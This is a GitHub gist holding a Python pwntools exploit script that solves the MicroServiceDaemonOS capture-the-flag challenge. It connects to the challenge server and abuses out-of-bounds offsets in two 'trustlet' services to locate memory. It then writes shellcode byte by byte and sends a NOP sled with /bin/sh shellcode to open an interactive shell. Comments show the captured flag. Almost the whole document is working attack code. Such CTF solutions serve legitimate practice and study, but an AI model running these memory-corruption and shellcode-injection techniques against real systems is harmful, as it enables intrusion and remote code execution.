Last active
June 26, 2019 14:21
-
-
Save nghiadt1098/1bbdf72bfe4d061053ff6e7418b37cdf to your computer and use it in GitHub Desktop.
MicroServiceDaemonOS
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from pwn import * | |
| import time | |
| from datetime import datetime, date | |
| #datetime.combine(date.today(), exit) - datetime.combine(date.today(), enter) | |
| #r=process("./MicroServiceDaemonOS",aslr=False) | |
| #context.log_level='debug' | |
| r = remote("microservicedaemonos.ctfcompetition.com",1337) | |
| # | |
| context.bits=64 | |
| context.arch='amd64' | |
| def let(c): | |
| r.recvuntil("Provide command: ") | |
| r.sendline("l") | |
| r.recvuntil("Provide type of trustlet: ") | |
| r.sendline(str(c)) | |
| def call_0(calltype,index=0,offset=0,count=0): | |
| r.sendline("c") | |
| r.recvuntil("Provide index of ms: ") | |
| r.sendline(str(index)) | |
| r.recvuntil("Call type: ") | |
| r.sendline(calltype) | |
| if calltype == "g": | |
| r.recvuntil("Provide page offset: ") | |
| r.sendline(str(offset)) | |
| r.recvuntil("Provide page count: ") | |
| r.sendline(str(count)) | |
| def call_1(calltype,index=0,size=0,offset=0,payload=""): | |
| if calltype == "s": | |
| r.sendline("c"+"\n"+str(index)+"\n"+calltype+"\n"+str(size)+"\n"+str(offset)) | |
| r.recvuntil("Provide data offset: ") | |
| r.send(payload) | |
| ret=r.recv(1) | |
| print "[CAll 1-write] Recved:",len(ret),repr(ret) | |
| return ret | |
| elif calltype == "g": | |
| r.sendline("c"+"\n"+str(index)+"\n"+calltype) | |
| ret = '' | |
| length = 64 | |
| while len(ret) < length: | |
| ret += r.recv(1) | |
| print "[CAll 1-checksum] Recved:",len(length),repr(ret) | |
| return ret | |
| TYPE_READ = 0 | |
| TYPE_WRITE = 1 | |
| TRUSTLET_0_setall = "s" | |
| TRUSTLET_0_read = "g" | |
| TRUSTLET_1_write = "s" | |
| TRUSTLET_1_checksum = "g" | |
| OFFSET=-134217728 | |
| let(TYPE_READ) | |
| let(TYPE_WRITE) # idx=0 | |
| call_1(TRUSTLET_1_write,1,64,OFFSET,"1234567") | |
| call_0(TRUSTLET_0_read,0,0,32727) | |
| k=u32(r.recv(4)) | |
| d=0 | |
| i=1 | |
| while(True): | |
| if(k!=u32(r.recv(4))): | |
| log.success("Found OFFSET :"+str(i)) | |
| d=i | |
| break | |
| i=i+1 | |
| shellcode=asm(''' | |
| push rbx; | |
| pop rdi; | |
| xchg rax, rsi; | |
| xchg eax, ebx; | |
| syscall | |
| ''') | |
| print "SHELLCODE LENGTH: "+ str(len(shellcode)) | |
| for i in range(0,len(shellcode)): | |
| res='' | |
| while(res!=shellcode[i]): | |
| res=call_1(TRUSTLET_1_write,1,64,-4096*d-0x4000+i,"1") | |
| log.info("Write "+str(i+1)+"/"+str(len(shellcode))+" bytes") | |
| log.success("Write "+str(i+1)+"/"+str(len(shellcode))+" bytes") | |
| context.log_level='debug' | |
| r.recvuntil("Provide command: ") | |
| r.sendline("c") | |
| r.recvuntil("Provide index of ms: ") | |
| r.sendline("1") | |
| r.recvuntil("Call type: ") | |
| r.sendline('g') | |
| r.send("\x90"*0x10+asm(shellcraft.amd64.linux.sh())) | |
| # r.close() | |
| r.interactive() | |
| #ls | |
| #MicroServiceDaemonOS | |
| #flag | |
| #cat flag | |
| #CTF{TZ-1n_us3rspac3-15-m3ss-d0nt-y0u-think_s0?} |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment